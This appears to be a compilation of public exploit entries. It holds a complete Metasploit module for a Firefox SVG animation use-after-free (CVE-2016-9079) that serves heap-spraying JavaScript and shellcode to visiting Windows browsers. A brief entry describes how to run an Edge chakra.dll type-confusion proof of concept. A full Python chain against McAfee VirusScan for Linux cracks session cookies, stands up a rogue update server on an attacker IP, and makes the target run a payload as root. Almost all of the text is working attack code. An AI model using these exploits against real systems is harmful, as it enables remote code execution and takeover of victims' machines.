Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
  # Metasploit browser-exploit module for CVE-2016-9079: an out-of-bounds /
  # use-after-free condition in Firefox's nsSMILTimeContainer::NotifyTimeChange().
  # Runs an HTTP server (HttpServer mixin) that fingerprints visitors and serves
  # an exploit page plus a companion worker.js.
  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::HttpServer
    # Standard module metadata; targets 32-bit Firefox on Windows only.
    def initialize(info={})
      super(update_info(info,
        'Name'           => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
        'Description'    => %q{
          This module exploits an out-of-bounds indexing/use-after-free condition present in
          nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
          on Microsoft Windows.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
          [
            'Anonymous Gaijin',                                 # Original research/exploit
            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
          ],
          'Platform'       => 'win',
          'Targets'        =>
          [
            [ 'Mozilla Firefox',
              {
                'Platform' => 'win',
                'Arch'     => ARCH_X86,
              }
            ],
          ],
          'DefaultOptions'  =>
          {
            'EXITFUNC' => "thread",
            'InitialAutoRunScript' => 'migrate -f'
          },
          'References'     =>
          [
            [ 'CVE', '2016-9079' ],
            [ 'Bugzilla', '1321066' ]
          ],
          'Arch'           => ARCH_X86,
          'DisclosureDate' => "Nov 30 2016",
          'DefaultTarget'  => 0
        )
      )
    # UsePostHTML substitutes data/exploits/firefox_smil_uaf/post.html into the
    # page after exploitation (see the '<blink>' marker handling in exploit_html).
    register_options(
      [
        OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation.  NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
      ], self.class
    )
  end
  # Builds and serves the exploit landing page: a JS heap-grooming script that
  # sprays ArrayBuffers and cloned SVG <animate> nodes, then triggers the bug
  # via repeated 'begin' attribute changes followed by pauseAnimations().
  # The web worker (served separately by worker_js) posts back the address used
  # as arrBase via e.data.
  def exploit_html(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    # NOTE(review): 'prefix=' here is an ordinary positional-argument assignment
    # in Ruby, not a keyword argument; payload_final is not referenced again in
    # this method — confirm whether it is dead code.
    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
    base_uri = "#{get_resource.chomp('/')}"
    # stuff that gets adjusted a lot during testing
    defrag_x = %Q~
       for (var i = 0; i < 0x4000; i++)
         heap80[i] = block80.slice(0)
     ~
     defrag_y = %Q~
       for (var i = 0x4401; i < heap80.length; i++)
         heap80[i] = block80.slice(0)
     ~
    # The exploit JavaScript below is served verbatim (with defrag_x/defrag_y
    # and the worker URI interpolated); do not reformat — layout is part of the
    # original exploit and the string content is behavior.
    js = %Q~
    var worker = new Worker('#{base_uri}/worker.js');
    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x5000);
    var heap100 = new Array(0x5000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;
    var animateX = undefined;
    var containerA = undefined;
    var milestone_offset = 0x90;
    var $ = function(id) { return document.getElementById(id); }
    var heap = function()
    {
     var u32 = new Uint32Array(block80)
     u32[4] = arrBase - milestone_offset;
     u32[0xa] = arrBase + 0x1000 - milestone_offset;
     u32[0x10] = arrBase + 0x2000 - milestone_offset;
     var x = document.createElementNS(svgns, 'animate')
     var svg = document.createElementNS(svgns, 'svg')
     svg.appendChild(x)
     svg.appendChild(x.cloneNode(true))
     for (var i = 0; i < 0x400; i++)
       {
         var node = svg.cloneNode(true);
         node.setAttribute('id', 'svg' + i)
         document.body.appendChild(node);
       }
       #{defrag_x}
       for (var i = 0; i < 0x400; i++)
         {
           heap80[i + 0x3000] = block80.slice(0)
           $('svg' + i).appendChild(x.cloneNode(true))
         }
         for (var i = 0; i < 0x400; i++)
           {
             $('svg' + i).appendChild(x.cloneNode(true))
             $('svg' + i).appendChild(x.cloneNode(true))
           }
           for (var i = 0; i < heap100.length; i++)
             heap100[i] = block100.slice(0)
             #{defrag_y}
             for (var i = 0x100; i < 0x400; i++)
               $('svg' + i).appendChild(x.cloneNode(true))
             }
             var exploit = function()
             {
               heap();
               animateX.setAttribute('begin', '59s')
               animateX.setAttribute('begin', '58s')
               animateX.setAttribute('begin', '10s')
               animateX.setAttribute('begin', '9s')
               // money shot
               containerA.pauseAnimations();
             }
             worker.onmessage = function(e)
             {
              worker.onmessage = function(e)
              {
               window.setTimeout(function()
               {
                 worker.terminate();
                 document.body.innerHTML = '';
                 document.getElementsByTagName('head')[0].innerHTML = '';
                 document.body.setAttribute('onload', '')
                 document.write('<blink>')
                 }, 1000);
  }
  arrBase = e.data;
  exploit();
  }
  var idGenerator = function()
  {
   return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
  }
  var craftDOM = function()
  {
   containerA = document.createElementNS(svgns, 'svg')
   var containerB = document.createElementNS(svgns, 'svg');
   animateX = document.createElementNS(svgns, 'animate')
   var animateA = document.createElementNS(svgns, 'animate')
   var animateB = document.createElementNS(svgns, 'animate')
   var animateC = document.createElementNS(svgns, 'animate')
   var idX = idGenerator();
   var idA = idGenerator();
   var idB = idGenerator();
   var idC = idGenerator();
   animateX.setAttribute('id', idX);
   animateA.setAttribute('id', idA);
   animateA.setAttribute('end', '50s');
   animateB.setAttribute('id', idB);
   animateB.setAttribute('begin', '60s');
   animateB.setAttribute('end', idC + '.end');
   animateC.setAttribute('id', idC);
   animateC.setAttribute('begin', '10s');
   animateC.setAttribute('end', idA + '.end');
   containerA.appendChild(animateX)
   containerA.appendChild(animateA)
   containerA.appendChild(animateB)
   containerB.appendChild(animateC)
   document.body.appendChild(containerA);
   document.body.appendChild(containerB);
  }
  window.onload = craftDOM;
    ~
    # If you want to change the appearance of the landing page, do it here
    html = %Q~
    <html>
    <head>
    <meta charset="utf-8"/>
    <script>
    #{js}
    </script>
    </head>
    <body>
    </body>
    </html>
    ~
    # '<blink>' is the substitution marker written by document.write() above:
    # either replaced with the operator-supplied post.html or stripped entirely.
    if datastore['UsePostHTML']
      f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
      c = f.read
      html = html.gsub("<blink>", c)
    else
      html = html.gsub("<blink>", "")
    end
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  # Serves worker.js from the data directory with the encoded payload spliced
  # in at the INSERTSHELLCODEHEREPLZ placeholder.
  def worker_js(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload = Rex::Text.to_unescape(p, arch)
    wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
    c = wt.read
    c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
    # NOTE(review): Ruby parses "\u9090" as the single codepoint U+9090 (UTF-8
    # encoded), not as a two-byte 0x90 0x90 NOP pair — confirm worker.js really
    # expects that literal character here.
    c = c.gsub("NOPSGOHERE", "\u9090")
    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  # True only when the User-Agent matches both /Firefox/ and /Windows/.
  def is_ff_on_windows(user_agent)
    target_hash = fingerprint_user_agent(user_agent)
    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
      return false
    end
      return true
  end
  # HttpServer callback: 404s unsupported browsers, routes /worker.js to
  # worker_js, everything else (the /\// regex matches any path containing a
  # slash, i.e. effectively all remaining requests) to the exploit page.
  def on_request_uri(cli, request)
    print_status("Got request: #{request.uri}")
    print_status("From: #{request.headers['User-Agent']}")
    if (!is_ff_on_windows(request.headers['User-Agent']))
      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
      send_not_found(cli)
      close_client(cli)
      return
    end
    if request.uri =~ /worker\.js/
      print_status("Sending worker thread Javascript ...")
      worker_js(cli)
      return
    end
    if request.uri =~ /index\.html/ or request.uri =~ /\//
      print_status("Sending exploit HTML ...")
      exploit_html(cli)
      close_client(cli)
      return
    end
  end
end

Microsoft Edge (Windows 10) – ‘chakra.dll’ Info Leak / Type Confusion

Author: Brian Pak
Source: https://github.com/theori-io/chakra-2016-11
Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip
chakra.dll Info Leak + Type Confusion for RCE
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
Tested on Windows 10 Edge (modern.ie stable).
FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
To run:
Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim Edge browser to FillFromPrototypes_TypeConfusion.html.

Remote Exploit McAfee Virus Scan Enterprise for Linux

'''
Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chained together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128'                 # Attacker IP for victim to connect back to
authorized_ip="127.0.0.1"           # IP address cookie will be valid for
update_server_port = 8080               # Port update server listens on
# NOTE(review): delay_seconds is not referenced anywhere else in this file —
# confirm it is intentional before removing.
delay_seconds = 10                      # How long should the server take to serve the update
target_port = 55443                 # Port to target
# Put payload script in payload.sh
# Initialization
# Event set by the local update server once the target has fetched catalog.z;
# the main driver blocks on it before shutting the server down.
payload_in_place = threading.Event()
# The target uses a self-signed cert; all requests pass verify=False, so
# suppress the resulting InsecureRequestWarning noise.
requests.packages.urllib3.disable_warnings()
# Shell script served to the target as the fake update catalog.
with open("payload.sh", "r") as f:
    payload = f.read()
def pprint(inp, flag=False):
    """Print a status banner: '# msg' for progress, '* msg' when flag is truthy."""
    marker = "*" if flag else "#"
    print("\n{} {}".format(marker, inp))
def crack_cookie():
    """Brute-force a valid nailsSessionId session token (CVE-2016-8023).

    The token embeds a login timestamp.  Starting slightly ahead of the
    current time and walking backwards one second per request, a candidate
    cookie is sent to an authenticated page until the server responds with
    a Set-Cookie header, which indicates the guess was accepted.

    Returns the valid cookie string.
    """
    pprint("Cracking Cookie")
    # A page that requires authentication
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
    # Start at the current time + 100 in case of recent login with clock skew
    date_val = int(time.time()+100)
    # Cookie is only checked against the timestamp field; the trailing padding
    # and authorized_ip fields satisfy the server-side format.
    cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
    # Make requests, print after every 600
    while True:
        cookie = cookie_fmt % date_val
        req_cookie = {"nailsSessionId": cookie}
        r = requests.get(url, cookies=req_cookie, verify=False)
        r.raise_for_status()
        # A Set-Cookie response means the guessed token was accepted.
        if "Set-Cookie" in r.headers:
            valid_cookie = cookie
            # Timestamp is the 4th '/'-separated field, before '-checksum'.
            timestamp = cookie.split("/")[3].split("-")[0]
            break
        elif date_val % 600 == 0:
            print("Now trying  %s" % time.asctime(time.localtime(date_val)))
        date_val -= 1
    pprint("Cookie Cracked: " + timestamp, True)
    return valid_cookie
def update_update_server(auth_cookie):
    """Repoint the target's update repository at our rogue server.

    Issues a single authenticated GET whose (double-URL-encoded) sitelist XML
    replaces the McAfeeHttp repository entry with local_ip:update_server_port.
    The encoded blob below is the original exploit payload; do not reflow it.

    auth_cookie: dict holding the cracked nailsSessionId cookie.
    """
    pprint("Updating update server")
    # Replace McAfeeHttp update server with attacker local_ip:update_server_port
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
    "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
    "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
    "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
    "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
    "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
    "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
    "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
    + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
    "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
    "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
    "eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
    "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
    "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
    "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
    "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
    "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
    "posProperty=fallback&useOfProxy=on"
    r = requests.get(url, cookies=auth_cookie, verify=False)
    r.raise_for_status()
    pprint("Updated update server", True)
def download_update(req_cookie):
    """Schedule and immediately start an update task on the target.

    POSTs a scheduled-task creation request (task name derived from the
    current time) whose 'task nstart' command makes the target fetch an
    update — i.e. our payload — from the rogue repository configured by
    update_update_server().

    req_cookie: dict holding the cracked nailsSessionId cookie.
    """
    pprint("Requesting target download payload")
    # Send request to make target download payload
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    updateName = "update_%d" % int(time.time())
    # Original exploit's encoded form body; {0} is the task name.
    postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
    "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
    "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
    "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
    "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
    "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
    "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
    "Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
    """Trigger execution of the downloaded payload (CVE-2016-8020/8021 chain).

    First fetches the on-demand-scan configuration page to extract a commit
    digest, then creates a scan profile whose enginePath points at the written
    catalog.z and whose scannerPath is /bin/sh, and starts the scan — causing
    the target to run the payload.

    req_cookie: dict holding the cracked nailsSessionId cookie.
    Returns False if the commit digest cannot be extracted.
    """
    pprint("Making target execute payload")
    #### Get commit_id and ODS_name
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
    ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
    "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
    "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
    ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
    "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
    r = requests.get(url, cookies=req_cookie, verify=False)
    r.raise_for_status()
    # The digest needed to commit configuration changes appears between pipes.
    regex = re.search("\|digest=(.+?)\|", r.text)
    if not regex:
        print("\nERROR: Could not get commit_id when generating evil scan\n")
        return False
    # First (and only) capture group of the digest regex.
    commit_id = regex.groups(1)[0]
    # Send request to start evil scan
    # Location update_update_server()/download_update() caused catalog.z to be
    # written to on the target.
    payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
    binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    ODS_name = "ODS_1"   # This may need to be increased if the name already exists
    scan_name = "scan_%s" % str(int(time.time()))
    # Format placeholders: {0}=commit_id {1}=ODS_name {2}=scan_name
    # {3}=payload_path {4}=binary_path.  Encoded blob is the original exploit
    # body; do not reflow.
    postdata =  ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
    "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
    "ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
    "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
    ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
    "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
    "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
    "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
    "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
    "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
    "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
    "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
    "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
    "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
    "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
    "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
    "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
    ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
    "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
    "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
    ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
    "on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
    "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
    "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
    "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
    "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
    "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
    "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
    "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
    "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload executed", 1)
def start_update_server():
    """Launch the rogue McAfee update server on a background thread.

    Serves the payload (module-level ``payload``) for /catalog.z and a
    SiteStat XML with an ever-increasing CatalogVersion for everything else,
    so the target always considers our repository newer.  Returns the
    HTTPServer instance so the caller can shut it down.
    """
    class RequestHandler(BaseHTTPRequestHandler):
        # Minimal HEAD support so the target's update client can probe us.
        def do_HEAD(s):
            s.send_response(200)
            s.send_header("Content-type", "text/html")
            s.end_headers()
        def do_GET(s):
            if s.path == "/catalog.z":
                s.send_response(200)
                s.send_header("Content-type", "text/html")
                s.end_headers()
                s.wfile.write(bytes(payload, "utf-8"))
                pprint("Payload placed", 1)
                # Unblock the main driver waiting in payload_in_place.wait().
                payload_in_place.set()
                # Die after sending payload so we send an incomplete response
                raise KillServer
            else: # Assume all other requests are for SiteStat - Always increasing version
                s.send_response(200)
                s.send_header("Content-type", "text/xml")
                s.end_headers()
                # CatalogVersion "2<epoch>" grows monotonically with time.
                s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
                """<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
                """ </SiteStatus>""") % int(time.time()), "utf-8"))
    # Throwing KillServer will shutdown the server ungracefully
    class KillServer(Exception):
        def __str__(self):
            return "Kill Server (not an error)"
    # ThreadingMixIn plus support for KillServer exceptions
    class AbortableThreadingMixIn(ThreadingMixIn):
        def process_request_thread(self, request, client_address):
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
            except KillServer:
                pprint("Killing update server dirtily")
                self.shutdown_request(request)
                self.shutdown() # Only if we want to shutdown
            except:
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
        pass
    pprint("Launching update server")
    srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
    # serve_forever runs on a daemon-less background thread; shutdown() is
    # called either via KillServer above or by the main driver.
    threading.Thread(target=srv.serve_forever).start()
    pprint("Update server started", 1)
    return srv
####################################################################################
# Main attack sequence: crack the session cookie, stand up the rogue update
# server, repoint the target at it, trigger the download, then execute.
####################################################################################
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target has downloaded our payload
payload_in_place.wait()
# Shutdown our update server
srv.shutdown()
# Make the target run /bin/sh against the downloaded catalog.z
exec_catalogz(auth_cookie)